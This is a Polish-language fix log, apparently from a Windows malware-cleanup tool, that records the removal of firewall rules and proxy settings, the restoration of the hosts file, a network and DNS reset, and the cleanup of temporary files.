"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9C72FBB1-9B02-4D58-B759-EB46EE0FA165}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2EB3AE89-1765-4A40-8C2E-AC80BB26DD7E}" => pomyślnie usunięto 
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{05458F64-71B7-4D7B-B787-50DEF3E7DC17}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{66422008-3EAC-430D-A4F3-E8789E4EBFEA}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{528EC959-68F4-4299-B77A-51BD0FFAB752}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D24C728C-7AF4-4667-9C60-4AE4BFFDC5BE}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{824589D8-984E-4791-9AA2-0AF6AB96114D}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{BC439E86-3C2D-487D-90CD-A8027DCD0163}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{FA7E57DE-46E9-44CC-90A1-C12FD2953734}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B27242ED-E50E-4991-BEF1-5D36B6767A8A}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CCB36B66-169F-48AE-8335-FB65681580C3}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B2F714ED-70E7-4302-9A1E-317DCD60FD3E}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EB151E14-9252-43D5-B5D7-95CB5A99BAE1}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{90358491-0F7E-4902-9E7A-387A36921D8B}" => pomyślnie usunięto 
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{BD26266C-9665-49F5-BB53-9A6D5F1440E1}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{15BBFBDA-FC59-4850-BE98-96D862905272}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{183568B8-EC84-4799-A0A0-6118469003BD}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9C431AB2-41D6-4B90-AF9C-28373F77D83D}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F04F5A38-DC16-414D-B0AD-BD65FD675285}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{17146151-E038-482B-ABBF-1C65287CF97D}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0C886FE7-BC52-4F4B-BF80-48350FF7DFC9}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{47A422BE-ADBB-49AD-A26C-F9F2785101BA}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A3AD3CFA-F373-40E5-818A-DF60D217637B}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{45F871DF-A008-4433-8F52-589FA43D706C}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CC4D3F11-73B5-46C4-AD72-AA8D5A30541B}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{408F5652-536C-47D8-A149-D9DEE0526756}" => pomyślnie usunięto 
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{C9334AA3-9765-4478-A9D6-8F714A7223DF}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{71E63A59-3089-4274-9D33-3AD38A2BD5B6}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{79F00C57-D74A-4787-9048-855974AD2632}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{4AB41BFF-B4BB-470B-9E3C-1D67658152A6}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E6ADA24F-2F38-4030-BBB1-5F90E4D39666}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{4BEBC431-FB63-4CBF-A456-4ED8E79F2154}" => pomyślnie usunięto "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{4C098975-9938-4F0D-BB32-725DC1EA1DC4}" => pomyślnie usunięto C:\Windows\System32\Drivers\etc\hosts => pomyślnie przeniesiono Hosts pomyślnie przywrócono. ========= RemoveProxy: ========= "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => pomyślnie usunięto "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => pomyślnie usunięto "HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => pomyślnie usunięto "HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => pomyślnie usunięto ========= Koniec RemoveProxy: ========= ========= netsh int ip reset ========= Resetting Compartment Forwarding, OK! Resetting Compartment, OK! 
Resetting Control Protocol, OK! Resetting Echo Sequence Request, OK! Resetting Global, OK! Resetting Interface, OK! Resetting Anycast Address, OK! Resetting Multicast Address, OK! Resetting Unicast Address, OK! Resetting Neighbor, OK! Resetting Path, OK! Resetting Potential, OK! Resetting Prefix Policy, OK! Resetting Proxy Neighbor, OK! Resetting Route, OK! Resetting Site Prefix, OK! Resetting Subinterface, OK! Resetting Wakeup Pattern, OK! Resetting Resolve Neighbor, OK! Resetting , OK! Resetting , OK! Resetting , OK! Resetting , OK! Resetting , failed. Odmowa dostępu. Resetting , OK! Resetting , OK! Resetting , OK! Resetting , OK! Resetting , OK! Resetting , OK! Resetting , OK! Restart the computer to complete this action. ========= Koniec CMD: ========= ========= ipconfig /flushdns ========= Windows IP Configuration Successfully flushed the DNS Resolver Cache. ========= Koniec CMD: ========= ========================= FilesInDirectory: C:\Users\Admin\AppData\Local\*.exe;*.dll;*.ini ======================== 2018-03-10 15:17 - 2018-03-10 15:17 - 000000002 ____A [23B58DEF11B45727D3351702515F86AF] () C:\Users\Admin\AppData\Local\WMI.ini ====== Koniec Filesindirectory ====== ========================= FilesInDirectory: C:\Users\Admin\*.exe;*.dll;*.ini ======================== 2018-05-17 09:31 - 2018-05-17 09:31 - 000000020 ___SH [6FC234AD3752E1267B34FB12BCD6718B] () C:\Users\Admin\ntuser.ini 2019-01-13 20:51 - 2019-01-13 20:51 - 000000009 ____A [93E6B6D7762D03CD4FD26D97AEE2C58C] () C:\Users\Admin\rstr2.ini 2019-03-23 13:59 - 2019-03-23 13:59 - 000000009 ____A [97A8045A0361167E36E1EF06448E2FC8] () C:\Users\Admin\rstr4.ini ====== Koniec Filesindirectory ====== =========== EmptyTemp: ========== BITS transfer queue => 9461760 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 329834727 B Java, Flash, Steam htmlcache => 1124 B Windows/system/drivers => 208188791 B Edge => 8704 B Chrome => 0 B Firefox => 0 B Opera => 433403206 B Temp, IE cache, history,
cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 6478086 B systemprofile32 => 0 B LocalService => 44020852 B LocalService => 0 B NetworkService => 0 B NetworkService => 0 B Admin => 274500193 B RecycleBin => 0 B EmptyTemp: => 1.2 GB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 11:10:18 ====